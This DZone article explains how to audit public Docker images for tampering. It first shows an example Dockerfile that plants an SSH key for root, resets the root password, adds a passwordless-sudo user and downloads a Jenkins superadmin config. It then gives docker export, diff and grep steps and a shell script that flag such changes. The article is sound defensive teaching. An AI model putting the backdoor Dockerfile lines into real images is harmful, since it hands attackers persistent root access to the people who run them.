Explore Docker Image For Security Concern


Nowadays people are happy to use community Docker images: setting up infrastructure is super fast and easy compared to the bad old days. But watch out, security risks are hiding inside!


Ignoring them could result in serious damage sooner or later.

How to Easily Identify Security Holes Inside Docker Images

Common Security Issues Inside Public Docker Images

Here is a simple example. (In the real world the changes would undoubtedly be more misleading and harder to diagnose.)

  • In lines 18-19 of the Dockerfile below, an ssh key is injected into authorized_keys. If you start sshd, you're in danger.
  • In line 22, the root password has been reset. Not good, is it?
  • In lines 25-26, a malicious OS user has been added.
  • In lines 29-31, that user has been promoted to super admin and can run any command without a password!
  • In lines 34-36, your Jenkins now has an unwelcome admin user. Yes, Jenkins is hot and popular, and you can do a lot of things with it, but so can the hackers! This case represents the application layer; it is certainly the most dangerous and the hardest to detect.
 1: ########## How To Use Docker Image ###############
 2: ##
 3: ##  Install docker utility
 4: ##  Download docker image: 
 5: ##   docker pull denny/test:v1
 6: ##  Boot docker container: 
 7: ##   docker run -t -P -d --name my-test denny/test:v1 /bin/bash
 8: ##
 9: ##  Build Image From Dockerfile. 
10: ##   docker build -f Dockerfile -t denny/test:v1 --rm=false .
11: ##################################################
12: 
13: FROM ubuntu:14.04
14: MAINTAINER Denny <denny@dennyzhang.com>
15: 
16: RUN mkdir -p /root/.ssh && \
17:   # SSH login by key file
18:   echo "ssh-rsa AAAAB3NzaC1...lOvno6KN5 denny@dennyzhang.com" \
19:        >> /root/.ssh/authorized_keys && \
20: 
21:   # Reset root password
22:   echo 'root:ChangeMe1' | chpasswd && \
23: 
24:   # Add a malicious user
25:   useradd denny && \
26:   echo 'denny:ChangeMe1' | chpasswd && \
27: 
28:   # Add user to super admin
29:   echo '%denny ALL=(ALL:ALL) NOPASSWD: ALL' > \
30:         /etc/sudoers.d/admins && \
31:   chmod 400 /etc/sudoers.d/admins && \
32: 
33:   # Add a superadmin user to Jenkins
34:   mkdir -p /var/lib/jenkins/users/superadmin && \
35:   wget -O /var/lib/jenkins/users/superadmin/config.xml \
36:     https://github.com/DennyZhang/devops_public/raw/tag_v2/doc/admin_conf_xml
37: 
38: CMD ["/bin/bash"]

Dump Change List Of Docker Images

Apparently, we still want to use community Docker images; we just need to rule out the insecure ones and audit as many of the potential security risks as possible. Docker images are built, directly or indirectly, from golden images provided by trusted sources, and the original golden images are usually clean.

So, What Changes Community Docker Images Have Made?

You can inspect the changes made to a Docker container with "docker diff $container_id". Unfortunately, Docker doesn't support comparing two images. Here is a feasible workaround:

  • List all files in the golden image:
container_name="container1"
docker_image="ubuntu:14.04"
result_list="/tmp/list1.txt"
docker stop $container_name; \
 docker rm $container_name || true
# Start a container from golden image
docker run -t --name $container_name \
 -d $docker_image /bin/bash

# List all files inside the container
docker export $container_name | \
  docker run -i --rm ubuntu tar tvf - \
  > $result_list

# Check the list
tail $result_list
# drwxr-xr-x 0/0      0   2016-08-02 08:26 bin/
# -rwxr-xr-x 0/0  21112   2014-10-07 19:22 bin/bash
# -rwxr-xr-x 0/0  31152   2013-10-21 13:15 bin/bunzip2
# lrwxrwxrwx 0/0      0   2013-10-21 13:15 bin/bzcmp -> bzdiff
# -rwxr-xr-x 0/0   2140   2013-10-21 13:15 bin/bzdiff
# ...
  • List all files in the problematic image. Note: it might take several minutes for large images:

container_name="container2"
docker_image="denny/gitlab:v1"
result_list="/tmp/list2.txt"
docker stop $container_name; \
 docker rm $container_name || true
# Start a container from the image under test
docker run -t --name $container_name \
 -d $docker_image /bin/bash

# List all files inside the container
docker export $container_name | \
  docker run -i --rm ubuntu tar tvf - \
  > $result_list

# Check the list
tail $result_list
  • Compare the two lists:
result1="/tmp/list1.txt"
result2="/tmp/list2.txt"
diff_result="/tmp/diff.txt"

diff $result1 $result2 > $diff_result

tail $diff_result
# > drwxr-xr-x 0/0     0  2015-12-20 13:34 var/spool/postfix/pid/
# > drwx------ 103/0   0  2015-12-20 13:34 var/spool/postfix/private/
# > drwx--s--- 103/0   0  2015-12-20 13:34 var/spool/postfix/public/
# > drwx------ 103/0   0  2015-12-20 13:34 var/spool/postfix/saved/
  • Check for security-relevant changes:
diff_result="/tmp/diff.txt"

# Check ssh authorized login
grep authorized_keys $diff_result

# Check OS users
grep "etc/group" $diff_result

# Check sudo users
grep "etc/sudoers.d" $diff_result

# Check ssh key pairs
grep ".ssh/.*id_rsa" $diff_result

# Add your own checks below
# ...
# ...

After the test, remember to remove the temporary containers.
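The whole workflow (the file-list diff, and the checks for the five kinds of modification the Dockerfile example above makes) as an added example that is not the article's own code. It is a POSIX shell script that replays the diff-then-grep steps offline on two constructed listings in the format that "docker export | docker run -i --rm ubuntu tar tvf -" prints: one standing in for the golden ubuntu:14.04 image, one for an image modified like the Dockerfile above. The listing contents, the temp file names and the category names are assumptions; in real use you would generate the two lists with the docker commands from the steps above.

```shell
#!/bin/sh
# Added example, not the article's own code. Replays the diff-then-grep
# workflow offline on two constructed listings in the format that
# "docker export | docker run -i --rm ubuntu tar tvf -" prints
# (perm owner/group size date time name). In real use, generate
# $GOLDEN_LIST and $SUSPECT_LIST with the docker commands from the article.

GOLDEN_LIST="${TMPDIR:-/tmp}/golden_list.$$"
SUSPECT_LIST="${TMPDIR:-/tmp}/suspect_list.$$"
CHANGES="${TMPDIR:-/tmp}/image_changes.$$"
trap 'rm -f "$GOLDEN_LIST" "$SUSPECT_LIST" "$CHANGES"' EXIT

# Constructed sample: a few entries standing in for the golden image.
cat > "$GOLDEN_LIST" <<'EOF'
drwxr-xr-x 0/0      0   2016-08-02 08:26 bin/
-rwxr-xr-x 0/0  21112   2014-10-07 19:22 bin/bash
-rw-r--r-- 0/0   1234   2016-08-02 08:26 etc/group
-rw-r--r-- 0/0   2048   2016-08-02 08:26 etc/passwd
-r--r----- 0/0    755   2016-08-02 08:26 etc/sudoers
EOF

# Constructed sample: the same image after a Dockerfile like the one above
# ran (new accounts, a sudoers drop-in, an authorized_keys, a Jenkins user).
cat > "$SUSPECT_LIST" <<'EOF'
drwxr-xr-x 0/0      0   2016-08-02 08:26 bin/
-rwxr-xr-x 0/0  21112   2014-10-07 19:22 bin/bash
-rw-r--r-- 0/0   1260   2016-09-01 10:00 etc/group
-rw-r--r-- 0/0   2100   2016-09-01 10:00 etc/passwd
-r--r----- 0/0    755   2016-08-02 08:26 etc/sudoers
-r-------- 0/0     40   2016-09-01 10:00 etc/sudoers.d/admins
drwx------ 0/0      0   2016-09-01 10:00 root/.ssh/
-rw------- 0/0    400   2016-09-01 10:00 root/.ssh/authorized_keys
-rw-r--r-- 0/0   3000   2016-09-01 10:00 var/lib/jenkins/users/superadmin/config.xml
EOF

# Entries present only in the second listing: files that were added, or
# whose size/mtime changed. diff marks them with "> ", as in the article.
image_changes() {
    diff "$1" "$2" | sed -n 's/^> //p'
}

# Classify each changed entry by its path (field 6 of a tar tvf line; the
# symlink target after "->" is ignored). Prints "<category> <path>" per hit.
# The category names are this example's own, not the article's.
audit_changes() {
    awk '{
        path = $6
        cat = ""
        if (path ~ /authorized_keys$/)                   cat = "ssh-login"
        else if (path ~ /\.ssh\/.*id_rsa/)               cat = "ssh-keypair"
        else if (path ~ /^etc\/sudoers/)                 cat = "sudo"
        else if (path ~ /^etc\/(passwd|group|shadow)$/)  cat = "os-users"
        else if (path ~ /^var\/lib\/jenkins\/users\//)   cat = "jenkins-users"
        if (cat != "") printf "%-14s %s\n", cat, path
    }' "$1"
}

# Number of flagged entries; non-zero means the image needs a closer look.
finding_count() {
    audit_changes "$1" | wc -l | tr -d ' '
}

image_changes "$GOLDEN_LIST" "$SUSPECT_LIST" > "$CHANGES"
echo "Added or changed entries: $(wc -l < "$CHANGES" | tr -d ' ')"
audit_changes "$CHANGES"
echo "Flagged entries: $(finding_count "$CHANGES")"
```

On the two constructed listings the script reports six added or changed entries and flags five of them (the modified etc/passwd and etc/group, the sudoers drop-in, the root authorized_keys and the Jenkins user directory); the bare root/.ssh/ directory is not flagged, which is why matching on the full path rather than on the directory name matters. Matching on the path column instead of the raw diff line also avoids false hits on size or date fields, which is the main weakness of the plain grep checks above.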

More Reading: 5 Tips For Building Docker Image.


Topics:
docker ,devops ,security best practices

Published at DZone with permission of Denny Zhang, DZone MVB. See the original article here.
